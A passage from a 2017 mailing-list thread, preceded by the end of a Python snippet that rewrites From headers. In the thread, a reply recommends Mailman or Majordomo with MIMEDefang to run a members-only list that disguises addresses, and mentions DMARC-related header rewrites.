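        name, addr = parseaddr(original)
        out["From"] = formataddr((name or addr, daemon_sender))
        out["X-Original-From"] = original
    return out
```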

Re: How to implement something close to, but not quite an "announcement-only" mailing list?

2017-04-14 Thread Kevin A. McGrail

On 4/14/2017 9:35 PM, Ramon F Herrera wrote:


I guess this would be more descriptive and succinct:

A "members-only PLUS disguising of all e-mail addresses contained 
in the headers" mailing list.
I didn't follow all your logic in the previous email but overall you'll 
likely need something like mailman or majordomo plus something like 
MIMEDefang in front of it to achieve your needs.


Happy to share a snippet for mimedefang that handles the rewrites needed 
from when DMARC was released and broke a lot of mailing lists.


The Bunny, The Bunny, Oh, I ate the Bunny,
KAM